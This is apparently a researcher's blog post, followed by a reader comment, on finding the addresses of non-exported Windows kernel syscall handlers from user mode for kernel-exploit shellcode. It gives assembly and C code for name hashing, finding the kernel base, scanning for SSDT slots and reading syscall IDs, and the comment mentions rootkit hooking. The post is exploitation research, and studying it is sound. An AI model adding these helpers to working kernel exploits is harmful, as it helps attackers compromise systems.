Today I would like to write about finding the addresses of non-exported kernel functions (syscall handlers) from user mode. The technique is my own idea, which occurred to me during one of my talks about Windows x86 kernel exploitation (greetings to suN8Hclf!). That said, I cannot guarantee that it wasn’t invented and described independently by other authors months or years ago. If any of you readers are aware of a similar publication, please let me know (I will gladly publish some supplementary material to this post). Let’s get to the point…
The subject of practical exploitation of vulnerabilities in the system kernel or one of its modules is simply too broad to cover in full here. The technical aspects of making use of such vulnerabilities have already been described by a number of researchers, and the results of their work can be found, among other places, here:
- Kernel-mode Payloads on Windows
- Remote Windows Kernel Exploitation – Step into the Ring 0
- How to exploit Windows kernel memory pool
A basic problem, usually encountered by a novice reverser digging into kernel-mode bugs, is how to take advantage of them in practice. When the vulnerability eventually lets you execute your own code in the kernel context and create a relatively stable environment, the question is: what now? In reality, nearly every piece of functionality we would like to implement requires some external kernel functions. In 99% of cases, the module being imported from is simply ntoskrnl.exe (or another variant of the kernel executable image). Many methods of finding its base address are available (e.g. Finding Ntoskrnl.exe Base Address @ Uninformed), and most of them are suitable for our purposes, so I will not cover this subject today.
The next step towards a fully functional payload is obtaining the virtual addresses of the specific functions we want to use. In the simplest scenario, where we only operate on exported functions, all we need is an easy way of parsing the internal Portable Executable structures, which can in fact be implemented in “a few” lines. A very common enhancement is a hash routine that converts long symbol names into short 16-32 bit values (as representative as the names themselves). The hashing algorithm doesn’t have to be complex at all; one simple bit operation such as a rotation is quite enough for our purposes:
; ASSUMPTIONS: ESI = string to hash (input)
;              EAX = return value (output)
;
GenerateNameHash:
  xor eax, eax            ; Zero out the EAX (hash) value
@HashLoop:
  rol eax, 13             ; Rotate left by 13 bits
  xor al, byte [esi]      ; Xor with the current char
  inc esi                 ; Increment pointer
  cmp byte [esi], 0       ; Check if NULL
  jnz @HashLoop           ; If not, carry on
  ret                     ; EAX is already set, we have nothing to do - return
In most cases we don’t even need more than the least-significant 16 bits of the function’s result, so a considerable amount of memory can be saved. Whether such an optimization is necessary depends on the type of vulnerability we’re dealing with, but we usually want to reduce the payload size to an absolute minimum. All in all, what we have considered so far is just getting access to publicly available addresses in the kernel image, which is not very hard to achieve. In my opinion, a much more interesting research subject is searching for internal functions that the kernel does not export in any way. In this case we are forced to use harder techniques, which mostly depend on the particular operating system version. Although there aren’t many universal solutions, there are specific situations in which we are able to get the address of a given internal function under some special conditions.
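For readers who prefer C to assembly, the hashing idea can be sketched roughly as follows. This is only an illustration under a few assumptions: the names `rol32`, `name_hash32`, `name_hash16` and `find_name_by_hash16` are hypothetical and do not come from the original payload, and unlike the assembly loop this version treats an empty string as hashing to 0.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Rotate a 32-bit value left by n bits (valid for 0 < n < 32). */
static uint32_t rol32(uint32_t value, unsigned n)
{
    return (value << n) | (value >> (32u - n));
}

/* C counterpart of GenerateNameHash: rotate the hash left by 13 bits,
   then XOR the current character into its low byte. */
static uint32_t name_hash32(const char *name)
{
    uint32_t hash = 0;

    assert(name != NULL);
    while (*name != '\0') {
        hash = rol32(hash, 13);
        hash ^= (uint8_t)*name++;
    }
    return hash;
}

/* Truncated variant: keep only the least-significant 16 bits. */
static uint16_t name_hash16(const char *name)
{
    return (uint16_t)(name_hash32(name) & 0xFFFFu);
}

/* Hypothetical lookup helper: index of the first name whose 16-bit hash
   equals `wanted`, or -1 if no name matches. */
static int find_name_by_hash16(const char *const *names, size_t count,
                               uint16_t wanted)
{
    assert(names != NULL);
    for (size_t i = 0; i < count; i++) {
        if (name_hash16(names[i]) == wanted)
            return (int)i;
    }
    return -1;
}
```

In a real payload the `names` array would be replaced by a walk over the export name table of the kernel image, and only the precomputed 16-bit constants would be embedded in the shellcode. Truncating to 16 bits makes collisions more likely, so the chosen constants should be checked against the full export list beforehand.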
In this particular case, the aforementioned conditions mean that the function belongs to the SSDT (System Service Descriptor Table), a simple array of pointers to the functions that handle the various system calls issued by user applications. Most of the syscall handlers are not directly exported by the kernel, though they turn out to be very useful when creating an advanced ring-0 payload. It should also be noted that obtaining the address of an SSDT function is a trivial task at driver level, provided we know the system call’s ID. In that case, the only “problem” is determining the system version in order to match the corresponding function number.
The same task is not so easy in user mode. Here, the only solutions known to me are based on heuristics, so they cannot be considered 100% reliable across Windows versions. Below is a list of the stages performed by an example application illustrating the method I am writing about:
- Loading the kernel image into our process context. Because the contents of the ntoskrnl.exe file will be used extensively in the following steps, we have to load it into the user-mode part of the process address space. Doing so lets us refer to “local” addresses of the exported functions in an easy and clean manner, and thus calculate the offset of any address relative to the real kernel ImageBase. Since we are not treating the loaded image as a typical DLL, we must ensure that nothing is done beyond loading the file contents into memory (for example, the executable’s EntryPoint must not be called as if it were a regular DllMain). Thanks to the extended LoadLibraryEx functionality, we can use the DONT_RESOLVE_DLL_REFERENCES flag and avoid any unwanted side effects, as documented:
If this value is used, and the executable module is a DLL, the system does not call DllMain for process and thread initialization and termination. Also, the system does not load additional executable modules that are referenced by the specified module.
- Choosing one specific function that can easily be found both inside the SSDT and on the kernel export list, e.g. NtCreateFile, NtCreateEvent, NtConnectPort or NtClose. This function is very important for us: since we know its exact address in kernel memory (based on the real and “temporary” kernel ImageBase addresses), we are able to determine the address of any other SSDT function, provided we know its SyscallId value (which can be obtained dynamically).
- Retrieving the ImageBase and ImageSize values of the loaded image, which can be done using one of the Process Status API functions, namely GetModuleInformation.
- Getting the real kernel base address, required to locate every function we are interested in. Two functions seem especially useful here: EnumDeviceDrivers and GetDeviceDriverBaseName (PSAPI). Using them, we can list and filter all the active kernel modules, including the kernel itself. The following piece of code illustrates how the real ImageBase value is queried:
DWORD GetDriverBaseAddr(const char* BaseName)
{
  static LPVOID BaseAddresses[4096]; // XXX: let's assume there are at most 4096 active device drivers
  DWORD cbNeeded;

  /* Get a list of all the drivers' Image Base Addresses */
  if(!EnumDeviceDrivers(BaseAddresses,sizeof(BaseAddresses),&cbNeeded))
    return 0;

  /* Never walk past the end of our own array, even if more drivers exist */
  if(cbNeeded > sizeof(BaseAddresses))
    cbNeeded = sizeof(BaseAddresses);

  CHAR FileName[MAX_PATH];

  /* Go thru the entire list */
  for( int i=0;i<(int)(cbNeeded/sizeof(LPVOID));i++ )
  {
    /* For each image base, retrieve the driver's name (skip entries that fail) */
    if(!GetDeviceDriverBaseNameA(BaseAddresses[i],FileName,sizeof(FileName)))
      continue;

    /* In case of the current module being kernel, return its base */
    if(!_stricmp(FileName,BaseName))
      return (DWORD)BaseAddresses[i];
  }

  /* Should never get here */
  return 0;
}
- Scanning the memory of the already loaded (user-mode) kernel image in search of the chosen function’s address (NtCreateFile in our case). This is the first, and the only, phase of the algorithm that relies on a heuristic. Its task is to find the place inside the SSDT where the exported function’s pointer is stored. This technique could lead to false positives under certain conditions (when more than one matching value is found), hence it is strongly advised to check some additional conditions. As we know that the only satisfying result is a place inside the SSDT, we can assume that the adjacent values should also point inside the NTOSKRNL.EXE memory range. As it turns out, these conditions are enough to reduce the number of false positives to zero (on every Windows version I tested). Here’s the code performing the described memory scan:
/* Start one DWORD into the image and stop two DWORDs before its end,
   so that the reads at i-4 and i+4 never leave the mapped image */
for( PUCHAR i=(PUCHAR)KernelImageStart+sizeof(DWORD);i<(PUCHAR)KernelImageEnd-2*sizeof(DWORD);i++ )
{
  if(( *(DWORD*)(i+0) == SearchedFunctions[0].Address ) &&
     ( *(DWORD*)(i-4) >= OrgKernelStart && *(DWORD*)(i-4) <= OrgKernelEnd ) &&
     ( *(DWORD*)(i+4) >= OrgKernelStart && *(DWORD*)(i+4) <= OrgKernelEnd ) )
  {
    printf("[+] Function pointer found at [0x%.8x]\n",(UINT)i);
    SearchedFunctions[0].SsdtAddress = (DWORD)i;
    break;
  }
}
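To see why the neighbour check matters, the same heuristic can be tried on a synthetic buffer instead of a real kernel image. The sketch below is a portable approximation, not the code from the attached sources: `read_u32le`, `write_u32le`, `in_range` and `find_ssdt_slot` are hypothetical names, the range is treated as half-open, and the buffer layout used in the usage note is made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Read a little-endian 32-bit value from a possibly unaligned position. */
static uint32_t read_u32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Store a 32-bit value in little-endian byte order. */
static void write_u32le(uint8_t *p, uint32_t value)
{
    p[0] = (uint8_t)(value & 0xFFu);
    p[1] = (uint8_t)((value >> 8) & 0xFFu);
    p[2] = (uint8_t)((value >> 16) & 0xFFu);
    p[3] = (uint8_t)((value >> 24) & 0xFFu);
}

/* Does `value` look like a pointer into [range_start, range_end)? */
static int in_range(uint32_t value, uint32_t range_start, uint32_t range_end)
{
    return value >= range_start && value < range_end;
}

/* Scan `image` byte by byte for `wanted`, accepting a hit only if the
   32-bit values directly before and after it also fall into the given
   range. Returns the offset of the first accepted hit, or -1. The scan
   starts at offset 4 and stops 8 bytes before the end, so neither
   neighbour read leaves the buffer. */
static long find_ssdt_slot(const uint8_t *image, size_t size, uint32_t wanted,
                           uint32_t range_start, uint32_t range_end)
{
    assert(image != NULL);
    if (size < 12)
        return -1;

    for (size_t off = 4; off + 8 <= size; off++) {
        if (read_u32le(image + off) == wanted &&
            in_range(read_u32le(image + off - 4), range_start, range_end) &&
            in_range(read_u32le(image + off + 4), range_start, range_end))
            return (long)off;
    }
    return -1;
}
```

If a 64-byte zeroed buffer holds the value 0x00401000 once at offset 8 (surrounded by zeros) and once at offset 32 between 0x00402000 and 0x00403000, a scan for 0x00401000 with the range 0x00400000 to 0x00500000 skips the first occurrence and reports offset 32, because only there do both neighbours look like kernel pointers.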
- Reading the system call ID numbers of the functions of interest. There is a very easy and reliable way of reading the system call number of any NTDLL wrapper, without any need to check the operating system version or (what’s even worse) to define static SyscallIds in the source. What we take advantage of is the fixed layout of the routines that pass execution to the kernel, which can be observed in the two following examples:
.text:7C90D090 ; __stdcall NtCreateFile(x, x, x, x, x, x, x, x, x, x, x)
.text:7C90D090 _NtCreateFile@44 proc near
.text:7C90D090
.text:7C90D090 B8 25 00 00 00    mov     eax, 25h
.text:7C90D095 BA 00 03 FE 7F    mov     edx, 7FFE0300h
.text:7C90D09A FF 12             call    dword ptr [edx]
.text:7C90D09C C2 2C 00          retn    2Ch
and
.text:7C90D580 ; __stdcall NtOpenFile(x, x, x, x, x, x)
.text:7C90D580 _NtOpenFile@24 proc near
.text:7C90D580
.text:7C90D580 B8 74 00 00 00    mov     eax, 74h
.text:7C90D585 BA 00 03 FE 7F    mov     edx, 7FFE0300h
.text:7C90D58A FF 12             call    dword ptr [edx]
.text:7C90D58C C2 18 00          retn    18h
As presented, we are able to obtain the syscall number by reading the 32-bit instruction operand from the [FunctionAddress+1] address. This works because the first instruction of every NTDLL wrapper function is always
mov eax, SYSCALL_ID
where SYSCALL_ID is a complete, 32-bit number. In our case, the code responsible for retrieving the numbers of the respective functions could look like this:
/* Get the SyscallId values for each function from the user-mode (ntdll.dll) code */
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");

for( ULONG i=0;SearchedFunctions[i].FunctionName;i++ )
{
  FARPROC pFunc = GetProcAddress(hNtdll,SearchedFunctions[i].FunctionName);

  /* Ignore invalid entries */
  if(pFunc==NULL)
    continue;

  /* The 32-bit immediate follows the one-byte "mov eax, imm32" opcode */
  SearchedFunctions[i].SyscallId = *(DWORD*)(((DWORD)pFunc)+1);
}
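A slightly more defensive variant of the same read can be sketched in portable C by working on a copy of the stub bytes and checking the opcode first. The helper name `read_syscall_id` is hypothetical; the only facts taken from the listings above are that the stub starts with the byte B8 (`mov eax, imm32`) followed by a little-endian 32-bit immediate.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define OPCODE_MOV_EAX_IMM32 0xB8u

/* Extract the syscall ID from the first instruction of a wrapper stub.
   Returns 1 and stores the ID in *id_out if the stub starts with
   "mov eax, imm32"; returns 0 (leaving *id_out untouched) otherwise,
   for example when the stub is too short or has been patched. */
static int read_syscall_id(const uint8_t *stub, size_t size, uint32_t *id_out)
{
    assert(stub != NULL && id_out != NULL);

    if (size < 5 || stub[0] != OPCODE_MOV_EAX_IMM32)
        return 0;

    /* The immediate operand is stored in little-endian byte order. */
    *id_out = (uint32_t)stub[1] | ((uint32_t)stub[2] << 8) |
              ((uint32_t)stub[3] << 16) | ((uint32_t)stub[4] << 24);
    return 1;
}
```

Fed with the NtCreateFile bytes from the listing (B8 25 00 00 00 ...), the helper yields 25h. A stub whose first byte is not B8, for instance one overwritten with a jump by a user-mode hook, is rejected instead of producing a bogus ID.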
- Recalculating the SSDT functions’ addresses by performing the following steps:
- Getting a pointer value from the address:
(BaseFunction.SsdtAddress + (CurrentFunction.SyscallId - BaseFunction.SyscallId)*sizeof(PVOID))
that is, the address obtained by moving from the base routine’s SSDT slot (NtCreateFile) backward or forward, depending on the number of the function being searched for.
- Converting the pointer to kernel-memory address:
CurrentFunction.KernelAddress = CurrentFunction.Address - LocalKernelImageBase + RealKernelImageBase
By performing the above steps, we can obtain the address of any system call handler, on the condition that its user-mode counterpart is exported by ntdll.dll (this is not necessary if we decide to use constant SyscallId numbers). It should be noted that the described method only lets us obtain the addresses of some kernel functions; we still cannot read or modify the memory these addresses point to. Because of this, the technique itself is not useful for tasks such as validating the contents of the SSDT. However, it makes it a lot easier to calculate the addresses and integrate them into our shellcode before the exploitation process even starts, which in turn makes exploit writing more comfortable.
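The arithmetic of the last stage can be checked with a small worked sketch. It assumes 32-bit pointers (x86, as in the rest of the post) and uses hypothetical helper names, `ssdt_slot_for` and `rebase_to_kernel`; the addresses in the usage note are invented for illustration and do not come from a real system.

```c
#include <assert.h>
#include <stdint.h>

/* Size of one SSDT entry on x86, i.e. sizeof(PVOID) for a 32-bit kernel. */
#define SSDT_ENTRY_SIZE 4u

/* Address, inside the locally loaded image, of the SSDT slot belonging to
   `target_id`, given the slot already found for the base function.
   Unsigned arithmetic wraps modulo 2^32, so a target ID lower than the
   base ID correctly moves the result backward. */
static uint32_t ssdt_slot_for(uint32_t base_slot_addr, uint32_t base_id,
                              uint32_t target_id)
{
    return base_slot_addr + (target_id - base_id) * SSDT_ENTRY_SIZE;
}

/* Translate a pointer that is valid in the local (user-mode) mapping of
   the kernel image into the corresponding address in the running kernel. */
static uint32_t rebase_to_kernel(uint32_t local_ptr, uint32_t local_base,
                                 uint32_t real_base)
{
    assert(local_ptr >= local_base);
    return local_ptr - local_base + real_base;
}
```

For example, if the NtCreateFile slot (ID 25h) was found at local address 0x00A12094, the slot for NtOpenFile (ID 74h) lies 4Fh entries further, at 0x00A121D0. If the pointer stored there were 0x00A98765, with the image loaded locally at 0x00A00000 and the real kernel at 0x804D7000, the handler’s kernel address would be 0x8056F765.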
Some source code illustrating how the described technique works is available here (3kB).
Have fun && leave some comments! ;)
Hello,
A few years ago, rootkits obtained the addresses of system services not exported by the kernel in a way similar to the one described above. The difference is that they did it from kernel level, taking advantage of the fact that the ntdll.dll library is “accessible” from there. The article at hxxp://www.rootkit.com/newsread.php?newsid=248 – Simple Hooking of Functions not Exported by Ntoskrnl.exe describes how to manually map the ntdll.dll image from kernel level in order to obtain the numbers of the services exported by that library.
In my experience, no non-exported system services are needed when preparing a functional payload (if anyone has their own theory about a payload that could not be implemented without services not exported by the kernel, I will gladly discuss it). All the necessary services (ZwXxx) and the remaining functions are exported by the kernel. In many cases the most effective way of gaining access to specific structure fields, e.g. of the process object (Token), is to use hard-coded offsets specific to a given system version and SP. A similar approach can be used to identify system services, e.g. those belonging to the ShadowTable.
Regards,
Alex